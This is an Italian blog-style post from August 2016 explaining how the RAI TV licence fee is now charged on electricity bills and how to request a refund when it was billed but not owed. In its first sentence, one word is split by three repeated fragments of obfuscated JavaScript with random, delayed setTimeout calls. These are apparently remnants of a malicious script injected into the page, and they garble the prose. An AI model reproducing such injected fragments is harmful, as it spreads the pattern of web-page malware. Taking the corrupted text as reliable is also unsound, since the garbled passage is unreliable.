Mese: agosto 2016

Closeup of a businesswoman doing finances

Rimborso Canone RAI addebitato in bolletta e non dovuto

In questo periodo stanno arrivandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando le bollette di energia elettrica in cui è compreso anche l’importo relativo al canone di abbonamento RAI TV.

Si ricorda, infatti, che da quest’anno il canone verrà addebitato direttamente dall’azienda fornitrice di energia elettrica, che poi si occuperà di riversarlo all’erario.

L’importo che risulta in bolletta quest’anno, in via del tutto eccezionale, comprende tutte le rate scadute fino al 1° luglio 2016. Mentre a regime è previsto che sarà addebitato in 10 rate mensili, da gennaio ad ottobre.

Coloro che erano in possesso dei requisiti di esenzione, avrebbero dovuto procedere all’invio della dichiarazione di non detenzione entro il 16.05.2016, in via telematica o per posta ordinaria.

L’Agenzia delle Entrate ha recentemente pubblicato le modalità con cui richiedere il rimborso del canone, nel caso in cui sia stato addebitato in bolletta ma non risulti dovuto.

A questo link la tabella riassuntiva con tutti i dettagli